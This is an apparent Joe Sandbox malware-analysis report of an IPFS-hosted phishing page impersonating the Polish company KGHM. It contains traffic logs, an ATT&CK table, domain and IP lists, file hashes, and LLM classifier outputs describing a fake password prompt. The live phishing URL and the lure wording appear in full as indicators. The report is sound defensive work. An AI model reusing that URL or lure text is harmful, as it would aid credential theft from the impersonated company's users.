        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
        Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
        Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
        Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
        Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
        Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
        Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49745 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49862 version: TLS 1.2
        Source: classification engineClassification label: mal68.phis.win@19/85@50/290
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2028,i,18378094711220502365,9901515927781828100,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2028,i,18378094711220502365,9901515927781828100,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure1
        Drive-by Compromise
        Windows Management Instrumentation1
        Registry Run Keys / Startup Folder
        1
        Process Injection
        1
        Masquerading
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        Registry Run Keys / Startup Folder
        1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Extra Window Memory Injection
        1
        Extra Window Memory Injection
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        stackpath.bootstrapcdn.com
        104.18.11.207
        truefalse
          unknown
          cs837.wac.edgecastcdn.net
          192.229.133.221
          truefalse
            unknown
            server.mailxlsxpdfauth.com
            198.23.159.37
            truefalse
              unknown
              maxcdn.bootstrapcdn.com
              104.18.10.207
              truefalse
                unknown
                d26p066pn2w0s0.cloudfront.net
                13.32.27.44
                truefalse
                  unknown
                  ipapi.co
                  172.67.69.226
                  truefalse
                    unknown
                    code.jquery.com
                    151.101.66.137
                    truefalse
                      unknown
                      cdnjs.cloudflare.com
                      104.17.25.14
                      truefalse
                        unknown
                        static.addtoany.com
                        104.22.71.197
                        truefalse
                          unknown
                          www.google.com
                          142.250.186.68
                          truefalse
                            unknown
                            kghm.com
                            62.87.254.208
                            truetrue
                              unknown
                              webmail.supremecluster.com
                              94.136.171.57
                              truefalse
                                unknown
                                ipfs.io
                                209.94.90.1
                                truetrue
                                  unknown
                                  www.w3schools.com
                                  unknown
                                  unknownfalse
                                    unknown
                                    logo.clearbit.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comtrue
                                        unknown
                                        https://kghm.com/plfalse
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          142.250.186.68
                                          www.google.comUnited States
                                          15169GOOGLEUSfalse
                                          104.26.8.44
                                          unknownUnited States
                                          13335CLOUDFLARENETUSfalse
                                          142.250.186.46
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          104.18.10.207
                                          maxcdn.bootstrapcdn.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          172.217.16.138
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          13.32.27.77
                                          unknownUnited States
                                          7018ATT-INTERNET4USfalse
                                          173.194.76.84
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.185.202
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          172.67.39.148
                                          unknownUnited States
                                          13335CLOUDFLARENETUSfalse
                                          104.22.71.197
                                          static.addtoany.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          142.250.185.163
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          94.136.171.57
                                          webmail.supremecluster.comGermany
                                          41391CLUSTERS-ASDEfalse
                                          151.101.66.137
                                          code.jquery.comUnited States
                                          54113FASTLYUSfalse
                                          198.23.159.37
                                          server.mailxlsxpdfauth.comUnited States
                                          36352AS-COLOCROSSINGUSfalse
                                          142.250.186.74
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          209.94.90.1
                                          ipfs.ioUnited States
                                          40680PROTOCOLUStrue
                                          142.250.186.99
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          172.67.69.226
                                          ipapi.coUnited States
                                          13335CLOUDFLARENETUSfalse
                                          142.250.184.202
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          104.17.24.14
                                          unknownUnited States
                                          13335CLOUDFLARENETUSfalse
                                          1.1.1.1
                                          unknownAustralia
                                          13335CLOUDFLARENETUSfalse
                                          62.87.254.208
                                          kghm.comPoland
                                          21010KGHM-ASPolandPolkowicePLtrue
                                          13.32.27.44
                                          d26p066pn2w0s0.cloudfront.netUnited States
                                          7018ATT-INTERNET4USfalse
                                          142.250.185.138
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          192.229.133.221
                                          cs837.wac.edgecastcdn.netUnited States
                                          15133EDGECASTUSfalse
                                          104.18.11.207
                                          stackpath.bootstrapcdn.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          151.101.2.137
                                          unknownUnited States
                                          54113FASTLYUSfalse
                                          239.255.255.250
                                          unknownReserved
                                          unknownunknownfalse
                                          104.17.25.14
                                          cdnjs.cloudflare.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          IP
                                          192.168.2.16
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1543737
                                          Start date and time:2024-10-28 11:00:21 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                          Sample URL:https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:13
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • EGA enabled
                                          Analysis Mode:stream
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal68.phis.win@19/85@50/290
                                          • Exclude process from analysis (whitelisted): svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.186.46, 173.194.76.84, 34.104.35.123, 142.250.184.202, 172.217.16.138, 142.250.185.170, 142.250.185.74, 142.250.186.74, 142.250.186.138, 216.58.206.74, 142.250.186.42, 142.250.185.138, 142.250.185.234, 142.250.181.234, 142.250.185.202, 142.250.184.234, 142.250.185.106, 216.58.212.138, 142.250.186.170, 216.58.206.42
                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, ajax.googleapis.com, clientservices.googleapis.com, clients.l.google.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • VT rate limit hit for: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com
                                          InputOutput
                                          URL: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "contains_trigger_text": true,
                                            "trigger_text": "Loading kghm.com mail settings",
                                            "prominent_button_name": "unknown",
                                            "text_input_field_labels": "unknown",
                                            "pdf_icon_visible": false,
                                            "has_visible_captcha": false,
                                            "has_urgent_text": false,
                                            "has_visible_qrcode": false
                                          }
                                          URL: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "brands": [
                                              "kghm.com"
                                            ]
                                          }
                                          URL: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "contains_trigger_text": true,
                                            "trigger_text": "kghm.com refused to connect.",
                                            "prominent_button_name": "unknown",
                                            "text_input_field_labels": "unknown",
                                            "pdf_icon_visible": false,
                                            "has_visible_captcha": false,
                                            "has_urgent_text": false,
                                            "has_visible_qrcode": false
                                          }
                                          URL: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "brands": [
                                              "kghm.com"
                                            ]
                                          }
                                          URL: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "contains_trigger_text": true,
                                            "trigger_text": "You're accessing a secure settings, please provide your kghm.com password to continue.",
                                            "prominent_button_name": "NEXT",
                                            "text_input_field_labels": [
                                              "Password"
                                            ],
                                            "pdf_icon_visible": false,
                                            "has_visible_captcha": true,
                                            "has_urgent_text": false,
                                            "has_visible_qrcode": false
                                          }
                                          URL: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "brands": [
                                              "KGHM"
                                            ]
                                          }
                                          URL: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "contains_trigger_text": true,
                                            "trigger_text": "You're accessing a secure settings, please provide your kghm.com password to continue.",
                                            "prominent_button_name": "NEXT",
                                            "text_input_field_labels": [
                                              "Password"
                                            ],
                                            "pdf_icon_visible": false,
                                            "has_visible_captcha": false,
                                            "has_urgent_text": false,
                                            "has_visible_qrcode": false
                                          }
                                          URL: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "brands": [
                                              "KGHM"
                                            ]
                                          }
                                          URL: https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com Model: gpt-4o
                                          ```json{  "legit_domain": "kghm.com",  "classification": "known",  "reasons": [    "The brand 'KGHM' is a known Polish multinational corporation primarily involved in mining and metallurgy.",    "The URL 'ipfs.io' does not match the legitimate domain 'kghm.com' associated with the KGHM brand.",    "The domain 'ipfs.io' is associated with the InterPlanetary File System (IPFS), which is unrelated to KGHM.",    "Presence of a password input field on a non-legitimate domain for KGHM increases the suspicion of phishing.",    "The use of a generic domain like 'ipfs.io' for a specific brand like KGHM is unusual and suspicious."  ],  "riskscore": 9}
                                          Google indexed: False
                                          URL: ipfs.io
                                                      Brands: KGHM
                                                      Input Fields: Password
                                          URL: https://kghm.com/pl Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "contains_trigger_text": false,
                                            "trigger_text": "unknown",
                                            "prominent_button_name": "unknown",
                                            "text_input_field_labels": "unknown",
                                            "pdf_icon_visible": false,
                                            "has_visible_captcha": false,
                                            "has_urgent_text": false,
                                            "has_visible_qrcode": false
                                          }
                                          URL: https://kghm.com/pl Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "brands": []
                                          }
                                          URL: https://kghm.com/pl Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "contains_trigger_text": true,
                                            "trigger_text": "UWAGA! OSZUSTWO!",
                                            "prominent_button_name": "WICEJ INFORMACJI",
                                            "text_input_field_labels": "unknown",
                                            "pdf_icon_visible": false,
                                            "has_visible_captcha": false,
                                            "has_urgent_text": true,
                                            "has_visible_qrcode": false
                                          }
                                          URL: https://kghm.com/pl Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "brands": [
                                              "KGHM"
                                            ]
                                          }
                                          URL: https://kghm.com/pl Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "contains_trigger_text": true,
                                            "trigger_text": "UWAGA! OSZUSTWO!",
                                            "prominent_button_name": "WICEJ INFORMACJI",
                                            "text_input_field_labels": "unknown",
                                            "pdf_icon_visible": false,
                                            "has_visible_captcha": false,
                                            "has_urgent_text": true,
                                            "has_visible_qrcode": false
                                          }
                                          URL: https://kghm.com/pl Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "brands": [
                                              "KGHM"
                                            ]
                                          }
                                          URL: https://kghm.com/pl Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "contains_trigger_text": true,
                                            "trigger_text": "UWAGA! OSZUSTWO!",
                                            "prominent_button_name": "WICEJ INFORMACJI",
                                            "text_input_field_labels": "unknown",
                                            "pdf_icon_visible": false,
                                            "has_visible_captcha": false,
                                            "has_urgent_text": true,
                                            "has_visible_qrcode": false
                                          }
                                          URL: https://kghm.com/pl Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "brands": [
                                              "KGHM"
                                            ]
                                          }
                                          URL: https://kghm.com/pl Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "contains_trigger_text": true,
                                            "trigger_text": "UWAGA! OSZUSTWO!",
                                            "prominent_button_name": "WICEJ INFORMACJI",
                                            "text_input_field_labels": "unknown",
                                            "pdf_icon_visible": false,
                                            "has_visible_captcha": false,
                                            "has_urgent_text": true,
                                            "has_visible_qrcode": false
                                          }
                                          URL: https://kghm.com/pl Model: claude-3-haiku-20240307
                                          ```json
                                          {
                                            "brands": [
                                              "KGHM"
                                            ]
                                          }
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 09:00:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2673
                                          Entropy (8bit):3.9699443060154738
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:861D89543926CC1026C3F83E993BE585
                                          SHA1:CC091FD62291A1DBDAB49604720A8387EBF84A72
                                          SHA-256:4A3F77D1C1D03432DCF7542AF5C7C06E67E5DFDDDF9508D269638C692FFBAD99
                                          SHA-512:BA3F7FF72BDA1024E29E13DA28FFF560DB9A82286A67A08C90B619631F4F6FCD28F29D485AD687E0A4F7FDD963EE4A205706518990835B490ED3B1EADA8FC014
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....*.D )..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........4%.p.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 28 09:00:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2675
                                          Entropy (8bit):3.98655246620923
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4F0B6A85F9756EA2E61A8FD83CDF3E83
                                          SHA1:5F7CC89BBD1552A2408C666452330870270243A5
                                          SHA-256:792FA89C314EAFCCB84A6258054BD1126D6CCB88B810F36D327B04A57FFDE6E5
                                          SHA-512:4819FEAC3DC8AD1C0F5A75E0596C4A9474312FD4AF4EC20E644ECB72810C1E44FF1A8A0B49F3C4A5B6A7400698B5E9B5BAB49A013538D783AEA2831B1EC65F70
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.......D )..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I\Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........4%.p.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
